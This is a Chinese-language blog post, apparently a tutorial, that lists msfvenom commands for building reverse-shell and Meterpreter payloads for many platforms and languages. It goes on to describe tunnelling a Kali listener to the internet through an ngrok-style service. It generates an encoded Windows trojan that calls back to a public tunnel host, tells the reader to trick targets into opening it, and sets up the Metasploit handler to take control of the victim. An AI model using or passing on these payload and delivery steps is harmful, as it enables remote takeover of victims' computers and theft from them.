1. 程式人生 > >msfvenom生成payload命令+內網透到外網

msfvenom生成payload命令+內網透到外網

  

進入msfconsole並選擇exploit/multi /handler。為所使用的相關有效負載執行'set payload'並配置所有必需的選項(LHOST,LPORT等)。

執行並等待有效負載執行。對於下面的示例,它是非常自我解釋但LHOST應填入您的IP地址(如果在網路內攻擊,則為LAN IP,如果通過網際網路進行攻擊則為WAN IP),

LPORT應該是您希望重新連線的埠。

msfvenom -l

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode

對於所有shellcode,請參閱'msfvenom -help-formats'以獲取有效引數的資訊。Msfvenom將輸出能夠以此語言剪下和貼上的程式碼以供您利用。

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

  Metasploit處理程式可以很好地快速設定Metasploit以便接收您的傳入shell。處理程式應採用以下格式。

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

  完成所需的值後,以下命令將執行您的處理程式 'msfconsole -L -r'

內網透到外網+Metasploit控制客戶機

首先我們需要下載一個用於內網穿透的工具來進行埠對映與轉發。這裡我用的是linux64bit

 

https://www.ngrok.cc/#down-client ,接下來在上面的網站自行註冊申請,然後登陸然後申請免費隧道,選擇TCP協議,自定義遠端埠,
本地IP地址就是kali的IP地址,埠自定義,但不要衝突。

 

 

這裡請記住隧道id,以及自定義遠端埠,kali本機埠

將下載的客戶端放置於指定目錄,cd到目錄,在命令列執行ngrok

./sunny clientid 隧道id

 

這樣就完成了埠對映,它能將外網埠接收到的資料返回到本機kali的指定埠。

 

 

在kali中用msfvenom生成一個payload 
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=
free.idcfengye.com lport=16577 -f exe > shell.exe
將生成的木馬檔案以各種方式傳送到目標主機,誘使其開啟。

 

 Metasploit控制客戶機

 

切到Kali,使用Metasploit進行監聽。

設定監聽攻擊模組,監聽載荷,IP(kali本機),埠(ngrok裡自定義的本地埠),然後exp。

 

use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 10.10.10.129
set lport 12345
exploit

當客戶機執行木馬後,得到一個meterpreter,可以進行的操作。

 

關於隱藏木馬,加陌生殼,自啟動,檔案包含,程序轉移等各種姿勢加強木馬強度就需要等待更新。。。。。